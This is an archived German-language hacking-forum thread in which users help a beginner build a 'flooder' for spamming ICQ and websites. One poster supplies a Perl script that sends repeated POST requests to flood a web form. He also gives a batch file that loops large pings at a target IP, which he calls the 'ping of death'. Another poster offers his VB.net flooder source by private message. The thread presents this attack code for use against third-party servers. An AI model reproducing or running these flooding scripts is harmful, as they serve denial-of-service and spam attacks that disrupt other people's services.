PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Flooder??



SLOWgo
16.08.2009, 17:13
Hi,Leute will einen einfachen flooder coden der zB.ICQ spammt nicht für die neueren versionen mir zu schwer jedenfalls einen flooder---nur dazu brauche ich einen tut??ich kann leider nur html,lua.javascript:confused:
ein einfacher tut würde reichen:(

kalachnikov
16.08.2009, 17:18
Ein Tut würde dir eh nix bringen, wenn du die Sprachen nicht beherschst...
schau dir meinen einfachen flooder mal an-->

#!/usr/bin/perl

use IO::Socket::INET;
use Getopt::Std;

$host = "ip";
$path = "index.php";
$port = 3306;

my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, Proto => 'tcp')
or die("Could not connect to server");
for(my $i=1;$i<33;$i++){
printf $sock ("POST %s HTTP/1.1
Host: %s
User-Agent: Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.6c
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: %s
Content-Type: application/x-www-form-urlencoded
Content-Length: 92
do=add&vname=test&vemail=test%40te.com&vurl=&vcountry=Afghanistan&vcomment=test\r\n",$path, $host, $host);
}
close $sock

PSP_Joker
16.08.2009, 18:10
In Visual Basic.net gehts noch einfacher. Dafür gibts auf Youtube Millionen von Tutorials. Hab mir neulich auch mal aus langeweile einen gecodet, kann auch mehr, also so nen Standartding, aber den Source post ich hier mal nicht, es gibt genug Flooder in VB.net an denen du dich orientieren kannst.

SLOWgo
16.08.2009, 18:40
hättest du vlt. eine site für vb tuts--??

edit:könnte man einen flooder in batch realisieren??

PSP_Joker
16.08.2009, 19:08
Ich empfehle dir mal klein anzufangen http://www.youtube.com/watch?v=dncFpm0rEtA hier ist mal ein etwas komplizierteres "Hello World", das Tutorial zum Flooder find ich grad nicht, aber ich kann dir gern den Sourcecode von meinem per PN oder so schicken.

SLOWgo
16.08.2009, 19:16
jo bitte schicks mir per pn und hoffentlich findest du den tut zum flooder thankz!

kalachnikov
16.08.2009, 22:45
hättest du vlt. eine site für vb tuts--??

edit:könnte man einen flooder in batch realisieren??

schon mal was vom ping of death gehört?

@echo off
ping ip -t -l 15000
ping ip -t -l 15000


kannst natürlich mehrmals wiederholen oder es in der batch datei mehrmals hinschreiben usw..
(sry halt mich kurz, muss glei weg..)

PSP_Joker
16.08.2009, 23:56
Nach dem hab ich meinen ersten Flooder geschrieben: http://www.youtube.com/watch?v=l6NCiMN4OBE Source schick ich morgen, is schon spät^^